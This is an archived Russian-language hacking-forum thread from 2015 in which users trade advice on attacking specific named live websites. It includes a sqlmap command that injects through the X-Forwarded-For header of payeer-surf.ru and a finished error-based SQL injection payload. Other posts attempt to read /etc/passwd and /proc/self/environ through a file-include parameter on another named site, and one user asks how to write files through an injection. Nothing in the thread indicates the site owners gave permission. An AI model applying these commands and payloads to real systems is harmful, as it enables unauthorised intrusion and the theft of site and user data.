ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
13.06.2015, 13:53
|
|
Guest
Сообщений: n/a
Провел на форуме:
577
Репутация:
0
|
|
Сообщение от Br@!ns
Br@!ns said:
↑
вероятно есть скуля в форме регистрации, скидывай ссылку) ссылка на сам сайт: http://payeer-surf.ru/
сами ошибки с описанием) в CSS детали атаки схожи между вариантами, а в SQL инъекции везде одинаковое описание) как такое пробивается?
|
|
|
|
13.06.2015, 14:05
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от Hassle
Hassle said:
↑
ссылка на сам сайт:
http://payeer-surf.ru/
сами ошибки с описанием) в CSS детали атаки схожи между вариантами, а в SQL инъекции везде одинаковое описание) как такое пробивается?
 да, уязвимость в заголовке X-Forwarded-For
|
|
|
13.06.2015, 14:08
|
|
Guest
Сообщений: n/a
Провел на форуме:
577
Репутация:
0
|
|
Сообщение от yarbabin
yarbabin said:
↑
да, уязвимость в заголовке X-Forwarded-For это да, вижу) только я не знаю каким боком подойти, чтоб вывелось как url, для использования к примеру sqlmap
|
|
|
|
13.06.2015, 14:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
290351
Репутация:
173
|
|
Сообщение от Hassle
Hassle said:
↑
это да, вижу) только я не знаю каким боком подойти, чтоб вывелось как url, для использования к примеру sqlmap Смотри в сторону –level
|
|
|
|
13.06.2015, 14:30
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от Hassle
Hassle said:
↑
это да, вижу) только я не знаю каким боком подойти, чтоб вывелось как url, для использования к примеру sqlmap в sqlmap она не заведется. хотя правильный синтаксис такой:
Код:
Code:
sqlmap -u "http://payeer-surf.ru/" --headers="X-Forwarded-For: *" --dbs
проблема в том, что ошибка появляется при подстановке одинарной и двойной кавычки, пока не понял, почему так.
т. е.
Код:
Code:
X-Forwarded-For: 10.67.90.16"'
|
|
|
|
13.06.2015, 14:47
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от Hassle
Hassle said:
↑
это да, вижу) только я не знаю каким боком подойти, чтоб вывелось как url, для использования к примеру sqlmap конечный вектор:
Код:
Code:
10.67.90.16"'and(extractvalue(1,concat(0x3a,version())))='1
|
|
|
|
14.06.2015, 16:43
|
|
Guest
Сообщений: n/a
Провел на форуме:
238786
Репутация:
40
|
|
Здравствуйте !
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.avizinfo.com.ua/templates/js.php?files=/etc/passwd&side=front[/COLOR][/COLOR]
можно тут что-то придумать?
При запросе /proc/self/environ . выдаётся страница с текстом pool www . Так же и на другие логи. Почему не инклудится index?
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//kafa-info.com.ua/vh/index.php?pid=\[/COLOR][/COLOR]
Код HTML:
HTML:
http://papajohn.com.ua/ajax/catalog-change/?add=1&model_id=3
fucking day
как тут раскручивать ? Что-то я не догоняю. заранее спасибо ) |
|
|
|
15.06.2015, 02:24
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от BabaDook
BabaDook said:
↑
Здравствуйте !
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.avizinfo.com.ua/templates/js.php?files=/etc/passwd&side=front[/COLOR][/COLOR]
можно тут что-то придумать?
При запросе /proc/self/environ . выдаётся страница с текстом pool www . Так же и на другие логи. Почему не инклудится index?
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//kafa-info.com.ua/vh/index.php?pid=\[/COLOR][/COLOR]
Код HTML:
HTML:
http://papajohn.com.ua/ajax/catalog-change/?add=1&model_id=3
fucking day
как тут раскручивать ? Что-то я не догоняю. заранее спасибо ) по papajohn.com.ua это просто лог с ошибкой запроса, параметры в нем не участвуют.
kafa-info.com.ua: я не понял откуда ноги растут там, ничего не скажу
avizinfo.com.ua: по-моему там не инклуд, а просто читалка. не уверен, особо не смотрел
|
|
|
|
16.06.2015, 18:24
|
|
Guest
Сообщений: n/a
Провел на форуме:
98300
Репутация:
31
|
|
День добрый. Нашел скулю и по традиции всегда начинаю смотреть права.
File-priv=Y.
Отлично, далее смотрю отсчет акунетикса, написано Application Error Mesage, там давала ошибку с раскрытием пути функция отвечающая за шифрование пароля в md5. Поставил в sqlmap, и получал еррор, директория недоступна для записи. Потом я еще нашел phpinfo, попробовал подставлять пути из него и снова облом, даже в темповскую директорию ничего не грузит.
Payload:
Не пойму почему так происходит, я в раскрутке скуль далеко не проф, разве что UNION инъекцию раскрутить смогу. Почему-то файлы читать читаются, а чего-нибудь загрузить так нет. Еще в логах sqlmap'а нет привычного мне INTO OUTFILE метода, только LINES TERMINATED BY.
Что полезного можно из этого извлечь?
P.S Посмотри пароль от БД и зайди, через phpmyadmin например, не катит. Нет ни phpmyadmin'а, ни пароля.. |
|
|
|
16.06.2015, 19:31
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428
Репутация:
662
|
|
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
